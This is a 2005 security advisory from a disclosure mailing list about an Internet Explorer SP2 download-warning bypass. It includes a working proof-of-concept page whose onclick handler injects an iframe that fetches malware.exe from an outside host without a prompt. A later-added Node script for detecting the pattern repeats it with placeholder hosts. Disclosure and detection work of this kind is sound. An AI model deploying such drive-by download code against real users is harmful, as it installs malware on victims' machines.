Wieners, Brats, Franks, we've got 'em all.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Internet Explorer
Vendors: http://www.microsoft.com
Versions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Patched With: SP2;
Platforms: Windows
Bug: Remote File Download Information Bar Bypass
Exploitation: Remote with browser
Date: 13 Jan 2005
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Internet Explorer is currently the most common internet browser in the
world.

Microsoft Windows XP Service Pack 2 was designed to block any file download
with an information bar, which must be clicked and "Download File" selected
before the download proceeds.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

While trying to download a file in Microsoft Internet Explorer, the user
gets the information bar. The information bar mechanism blocks/catches all
references to downloadable files, even through JavaScript and HTML event
properties.

However, Microsoft's Internet Explorer (SP2) DOES NOT CATCH a "body" tag
with an HTML "onclick" event which dynamically creates "iframe" tags.
For a good, more complicated dynamic object creation I used the
"createElement" function. This way an attacker can make a user download a
file just by clicking anywhere on the page (not on a hyperlink).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Paste into an htm/html file and add "<" at the beginning of each line:

------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
embed>
body onclick='a=document.createElement("\<iframe src=\"http:\/\/theinsider.deep-ice.com\/malware.exe\"\>\<\/iframe\>");
document.body.appendChild(a);
setTimeout("document.execCommand\(\"refresh\")",1000)'>
center><br><br><br><br><br><br>Click AnyWhere You Want</center>
/BODY></HTML>
------------------------ cut here --------------------------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
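As an added defender-side illustration (not code from the advisory or its author), the following Node script scans HTML for the pattern the advisory describes: an inline event handler that builds an iframe whose src points at an executable. The host and file name in the sample pages are constructed placeholders, and the scanner is a regex heuristic rather than a full HTML/JS parser.

```javascript
// Added example, not part of the advisory: flag pages whose inline on*
// handler creates an <iframe> pointing at an executable file, the
// information-bar bypass pattern described above. Regex-based so it runs
// in Node without a DOM.
const EXEC_EXT = /\.(exe|scr|msi|bat|cmd|com|pif)$/i;

// Undo the backslash escapes the advisory uses inside the handler
// (\< \/ \" \( ) so the body reads as the script engine would see it.
function unescapeJs(s) {
  return s.replace(/\\(.)/g, '$1');
}

// Returns one record per inline handler that both creates an iframe and
// points its src at an executable.
function findSuspiciousHandlers(html) {
  const handlerRe = /\son([a-z]+)\s*=\s*(?:'([^']*)'|"([^"]*)")/gi;
  const hits = [];
  let m;
  while ((m = handlerRe.exec(html)) !== null) {
    const body = unescapeJs(m[2] !== undefined ? m[2] : m[3]);
    const makesIframe = /createElement\s*\(\s*["']\s*<?\s*iframe/i.test(body);
    const src = /src\s*=\s*["']?([^"'\s>]+)/i.exec(body);
    if (makesIframe && src && EXEC_EXT.test(src[1])) {
      hits.push({ event: m[1].toLowerCase(), src: src[1] });
    }
  }
  return hits;
}

// Constructed sample mirroring the advisory's page (placeholder host/file).
const SAMPLE_BYPASS = `<html><body onclick='a=document.createElement("\\<iframe
src=\\"http:\\/\\/example.invalid\\/payload.exe\\"\\>\\<\\/iframe\\>");
document.body.appendChild(a);'>
<center>Click anywhere</center></body></html>`;

// Constructed benign page: an onclick handler and a static iframe to an
// HTML page, neither of which should be flagged.
const SAMPLE_BENIGN = `<html><body onclick="document.getElementById('hint').style.display='block'">
<iframe src="http://example.invalid/page.html"></iframe>
<div id="hint">Thanks</div></body></html>`;

console.log(findSuspiciousHandlers(SAMPLE_BYPASS));
console.log(findSuspiciousHandlers(SAMPLE_BENIGN));
```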